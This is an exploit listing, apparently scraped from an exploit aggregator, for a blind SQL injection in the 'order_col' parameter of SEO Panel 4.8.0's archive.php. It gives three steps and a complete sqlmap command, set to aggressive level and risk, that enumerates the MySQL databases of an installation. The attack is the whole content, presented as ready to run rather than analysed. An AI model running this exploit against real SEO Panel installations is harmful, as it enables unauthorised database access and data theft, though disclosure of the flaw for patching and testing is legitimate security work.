Exploit for SEO Panel 4.8.0 SQL Injection

Name: Exploit for SEO Panel 4.8.0 SQL Injection
Rating: 5 (148 reviews)

2021-03-18 | CVSS 0.2

## https://sploitus.com/exploit?id=PACKETSTORM:161855
# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection  
# Date: 17/02/2021  
# Exploit Author: Piyush Patil  
# Vendor Homepage: https://www.seopanel.org/  
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0  
# Version: 4.8.0  
  
  
# Reference - https://github.com/seopanel/Seo-Panel/issues/209  
  
Step 1 - Login to the SEO Panel with admin credentials.  
Step 2 - Go to archive.php  
Step 3 - Change "order_col" value to "*" and copy the request  
Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL  
--dbs --technique=T --flush-session